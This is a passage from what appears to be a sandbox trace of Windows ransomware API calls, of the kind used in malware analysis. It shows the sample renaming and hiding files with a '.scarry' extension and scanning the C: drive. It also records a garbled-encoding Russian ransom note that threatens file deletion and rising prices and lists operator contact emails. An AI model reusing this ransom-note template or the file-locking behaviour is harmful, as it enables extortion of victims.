GlobalUnlock (hMem=0x450004) returned 0 [0103.645] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7c018, cbMultiByte=39, lpWideCharStr=0x18e740, cchWideChar=2047 | out: lpWideCharStr="wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry") returned 39 [0103.646] MoveFileW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry" (normalized: "c:\\wqt5ybokhxghqaydyclssrh4mrekabf0.scarry")) returned 1 [0103.646] CreateFileW (lpFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry" (normalized: "c:\\wqt5ybokhxghqaydyclssrh4mrekabf0.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.646] SetFileTime (hFile=0x190, lpCreationTime=0x18f7d0, lpLastAccessTime=0x18f7c8, lpLastWriteTime=0x18f7c0) returned 1 [0103.646] CloseHandle (hObject=0x190) returned 1 [0103.647] SetFileAttributesW (lpFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry", dwFileAttributes=0x27) returned 1 [0103.647] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18ea68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXTרּ\x18\x03") returned 36 [0103.647] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.647] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.647] GlobalUnlock (hMem=0x450004) returned 0 [0103.647] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.647] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.647] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.647] GlobalUnlock (hMem=0x450004) returned 0 [0103.648] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.648] GlobalUnlock (hMem=0x45000c) returned 0 [0103.648] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.648] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.648] FindFirstFileW (in: lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfce43100, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfce43100, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfce69260, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe4001ffb, dwReserved1=0x78e, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x577e58 [0103.648] FileTimeToLocalFileTime (in: lpFileTime=0x18f830, lpLocalFileTime=0x18f7b0 | out: lpLocalFileTime=0x18f7b0) returned 1 [0103.648] FileTimeToDosDateTime (in: lpFileTime=0x18f7b0, lpFatDate=0x18f7fe, lpFatTime=0x18f7fc | out: lpFatDate=0x18f7fe, lpFatTime=0x18f7fc) returned 1 [0103.648] FindClose (in: hFindFile=0x577e58 | out: hFindFile=0x577e58) returned 1 [0103.648] CreateFileW (lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.648] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.648] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0xdf9 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0xdf9 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] ReadFile (in: hFile=0x190, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18fa28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18fa28*=0xdf9, lpOverlapped=0x0) returned 1 [0103.649] CloseHandle (hObject=0x190) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0103.649] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.649] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.649] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.649] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.650] GlobalUnlock (hMem=0x45000c) returned 0 [0103.650] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.650] GlobalLock (hMem=0x450004) returned 0x588000 [0103.650] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.650] GlobalUnlock (hMem=0x45000c) returned 0 [0103.650] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.650] GlobalUnlock (hMem=0x450004) returned 0 [0103.650] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.650] CharLowerBuffW (in: lpsz="hiberfil.sys", cchLength=0xc | out: lpsz="hiberfil.sys") returned 0xc [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\hiberfil.sys", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\hiberfil.sys", lpUsedDefaultChar=0x0) returned 15 [0103.651] CharLowerBuffW (in: lpsz=".sys", cchLength=0x4 | out: lpsz=".sys") returned 0x4 [0103.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".sys", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".sysñ", lpUsedDefaultChar=0x0) returned 4 [0103.651] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0103.651] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0103.651] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.651] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.651] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.651] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.651] GlobalUnlock (hMem=0x450004) returned 0 [0103.651] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.651] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.651] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.651] GlobalUnlock (hMem=0x450004) returned 0 [0103.651] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.651] GlobalUnlock (hMem=0x45000c) returned 0 [0103.651] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.653] CharLowerBuffW (in: lpsz="pagefile.sys", cchLength=0xc | out: lpsz="pagefile.sys") returned 0xc [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\pagefile.sys", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\pagefile.sys", lpUsedDefaultChar=0x0) returned 15 [0103.654] CharLowerBuffW (in: lpsz=".sys", cchLength=0x4 | out: lpsz=".sys") returned 0x4 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".sys", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".sysñ", lpUsedDefaultChar=0x0) returned 4 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, 